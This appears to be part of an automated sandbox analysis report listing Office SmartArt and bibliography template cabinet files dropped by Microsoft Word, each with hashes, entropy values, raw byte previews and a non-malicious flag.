                                                                                                                            Preview:MSCF............D................................?..................................chevronaccent.glox.................Content.inf..O.$N...[.........B.....?.....$Zy..Zkr...y<.....Di-.aVX/....h..-.~........#.../.Fz....T...p....A..eHMe[..p...=................f..../%o......F@..=..$.B!....}.0..g..^vlI......f.W.F...Nm..2`...)...,.HL4.nsl.F.ir.k..e.!^.j2.v.iT....t...*..!h..Y...2Q..-.x.,.Xj.U.cj,....9.....)..W..n3f.......(cH.D.4M.!.+..4..3r..y......|r..@.PD.R..#...F..nJAR..1{-.....u3..$..L.b+h....:lZ.>....q.?. ~l..^.%.m....a...cG.h.?.|.?7.'....b.G.4..'..A...o.Z...//..?...d..*.....C..Z.....]Yv.g.]..... .........]x.#=.../.7;R.j....G.....zq=O`[.'5g.D.u..)..../../.v.JmCW.da....3.f..C.z%...S=....;A.q.|....z.E.aRu........ k..J"+.f.S.@.........eD4....\0..t./U..%.H..........M:..U.......J...Z..H.DG..u^..D..P....`.^b.........`c......#.....c.?...#..C.V.&.'..f.'...f.[..F.O..a...&..{TiXg4; .X."..0...B.#..^..........N"..w.@f...gd.S..K.....E....ZR...;.twR>.z.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):22008
                                                                                                                            Entropy (8bit):7.662386258803613
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                            MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                            SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                            SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                            SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................................?..................................architecture.glox.................Content.inf..q5.^...[.....0y......../..CL.C5.Q..U5g.z....UUUMPC...C..P....T.....=..s..4c...-3H..E...2..2*..T...../.i.;$..............%...................'h.........#0.......[........c.h.....O...%.61...[.J..:.,^....W.]$..u...N.R.....H.......:%I.g5Kd.n6...W2.#.UL..h.8NN../.P...H.;@.N.F...v."h..K.....~.....8...{.+...&.#A.Q'..A.....[NJ.X.....|.|.G5...vp.h.p..1.....-...gECV.,o{6W.#L....4v..x..z..)[.......T.....BQ.pf..D.}...H....V..[._.'.......3..1....?m..ad..c(K.......N.N.6F%.m......9...4..]?...l6..).\p;w.s....@...I%H.....;\...R......f...3~:C...A..x....X...>...:~.+..r@..."......I..m.y..)F.l..9...6....m...=..Q.F.z..u......J].{WX...V.Z.b.A0B..!....~.;Z.....K.`c..,X.MFz....].Q.2.9..L."...]...6...JOU..6...~../......4A.|.......i.LKrY...2.R.o..X.\....0.%......>H.....8.z..^....5d|...4|...C......R28.E......a....e...J.S..Ng.]<&..mm
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):22149
                                                                                                                            Entropy (8bit):7.659898883631361
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                                                                                                            MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                                                                                                            SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                                                                                                            SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                                                                                                            SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):25314
                                                                                                                            Entropy (8bit):7.729848360340861
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                            MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                            SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                            SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                            SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....#......D............................#...?...................#..............InterconnectedBlockProcess.glox......#..........Content.inf...<.:#.$[......O..........5f.P.5CU..6..jT..U..U..UM.T.........h................-... .......6...`.....G...........'.,DN:........... "..4..1u.....%.u..{{,....@lp..}..`.......Z...K.....Z..... Z4.<?..C.BF.....k.!Hl...]...Tvf..g....)...vny6.'..f....Z.R.`.......+....!..!.....:..4fj....."q..f..E..^!k.....M.c....R...B......g...~.........o.'.7,.e.,..7.R.e,(.+..+:....Q....f...P.H.I..U.....Jl...l...z.]7...C...<...L.,..@...i.{..e]K...2..KRW..7.-'.G.l!.n7..J.v.C...%/.....q...@..l..e..$..N..sg8]oo.(q(_.?.X.s...Ua..r0...Rz.o.eT.j...b*..}",n.qou..M.[.;%../c.x.4.z.2*.U.]..D...h...-R.$.=\3..P......N.mP......J...}BPn...g]d.5k..C.ee.ml...\.g...[.......<..6$.%.I#S9..I...6.i........_..P.n....c$.3..zw.hF......_{.+...o...[.&........&...M..m.....;....0....D7...4nQ.=/.._`._.nh.D.m..h.+....8..p..q.4.w.\...iy...*...lN6F..c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20235
                                                                                                                            Entropy (8bit):7.61176626859621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                            MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                            SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                            SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                            SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................................?..................................BracketList.glox.................Content.inf....7r...[.... G.q..@...B.....?X!.A.......!........X..Vk.JK...Z..=......PD.....P....5...jp..+..T....b.)np5.7.....Zz........... ..!.....S......1....`....h......T?.Nq../......z....[..:..5f;....O...d.FxD...4...Z....[..a...w..W.[..P...5.]...6..."...+t].!...2\%%`Q.\..)...=>.)......a.$.2.,...2,.Lw.?..+..qf....h....T/B.....}T.E...'.%.....,.......X....b..gt.hPYc|.....a...j...=...{..a.`!8!..|...L.T..k..!,.R.z/W....{..,...+..w.m..sQ..7<x..B....?....\.)..l...d...}.....v..W.C..'=p1c.Z=.W.g.e....&wm..N,..K.T../.oV../=9.}.....".28...r.Q....dzj{....S...1m...x9_...2PXpa...Q.n.$z...c..SGq...k......}kPE..*...3.|.5A.>..6.......+)qCB....q....qNkGe...W]..o..Z...J.<.i......qq.8....q..BE.(...._h.U.\@3.F...KdO..=1j+....).*Q.|B..Z..%......LDYk....j.....{klDW..#CVy}...X..O!..}..s..&..DC.....tL.j..b.......[...n.'..1..Xc...9Q..gM.....n..3...v.....~.).
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31482
                                                                                                                            Entropy (8bit):7.808057272318224
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                            MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                            SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                            SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                            SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):20554
                                                                                                                            Entropy (8bit):7.612044504501488
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                            MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                            SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                            SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                            SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....:.......D...........................:....?..................................PictureFrame.glox.................Content.inf........[.... '.q..@.........<./..+./. ...."o.o./..{^a.7^.D.HA....^J... ...........T%q..b...+pz.n.=....jT.+M..=H..A...py.3.........H...N...[..%..~....>.%....3.r...wx.....0.....7..94..2..45..7f.......D.. ...[...f.:H..../N..4.....8.....:x.I....u|.`."...\..N..%.M#..^v$.*....T.m.....?.-.wki.X..8..F.G..Y.^8...-....+.&.+&.No...e!.#.8.....YF.......<w.....=.Q.S..7....MW....M..9A.3..c..L....|.E-Y....]n".|....b9..l@.d.T...a.f...~.&k.[..yS..q..]L}..)w.....$.@..v...[9..X....V...a.NK....m9.5.....Kq.;9`.U.e...8.<..)Y.H........z.G...3n.yWa.g.>.w!e.B8:......f..h..z....o.1<.RT..WK...?g .N..+..p.B.|...1pR_......@...a....aA......ye..8...+M.l..(.d..f.;....g........8R.\.w.:ba....%...|p....`lrA.|....a.U.m=ld......7....#..?Dq..D.....(.5.K.a..c.G..7..]hF..%:}......}J.j$.....4...l];..v>.&j........Y.vk..$1.@X$...k...9..?...z..![..../...).a.=....aZ^.3?....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31562
                                                                                                                            Entropy (8bit):7.81640835713744
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                            MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                            SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                            SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                            SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31835
                                                                                                                            Entropy (8bit):7.81952379746457
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                            MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                            SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                            SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                            SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....K=......L...........................K=...?..................q<......................gb.xsl.................Content.inf.EF/.....[...A....3D.4..oVP!i/......t.6..l&9r0.8......c..q.^........$/..(./H ...^_Z0\4.42WU......P.F..9.._....'.D..<H@..E.b,K..9o..wo..v|..[.{7m.......|}aI..|g....IF2au?.1,..3.H.......ed....-.........m....$..8&0..w........2....s....z..d.Z.e.....@$r[..r..4...."E.Q@...Hh.B"b>...$.L.$.P.._..~.?./T..@..F..?.~G...MS..O%Z3*k..:..._...!GF..U...!..W..$..7...j......xy0..../.j..~4......8...YV....Fe.LU..J.B.k%BT5.X.q.w.a4....5..r...W.6.u...]i...t.....e.\.K............#t.c5.6....j...?#..{.m3.L9...E/....B[R.k(.'....S.'.}!j.tL..v....L....{<.m4......d_kD..D.....4`aC....rg..S..F.b..^........g;.`?,......\..T.\.H.8W.!V...1.T1.....|.Uh....T..yD'..R.......,.`h..~.....=......4..6E..x#XcVlc_S54 ..Q.4!V..P...{w..z.*..u.v....DC...W.(>4..a..h.t.F.Z...C.....&..%v...kt....n..2....+.@...EW.GE..%.:R`,}v.%.nx.P.#.f.......:.5(...]...n3{...v........Q..
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):22594
                                                                                                                            Entropy (8bit):7.674816892242868
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                            MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                            SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                            SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                            SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21111
                                                                                                                            Entropy (8bit):7.6297992466897675
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                            MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                            SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                            SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                            SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21875
                                                                                                                            Entropy (8bit):7.6559132103953305
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                            MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                            SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                            SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                            SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):19893
                                                                                                                            Entropy (8bit):7.592090622603185
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                                                                                            MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                                                                                            SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                                                                                            SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                                                                                            SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                                                                                            Malicious:false
                                                                                                                            Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):21791
                                                                                                                            Entropy (8bit):7.65837691872985
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                            MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                            SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                            SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                            SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                            Malicious:false
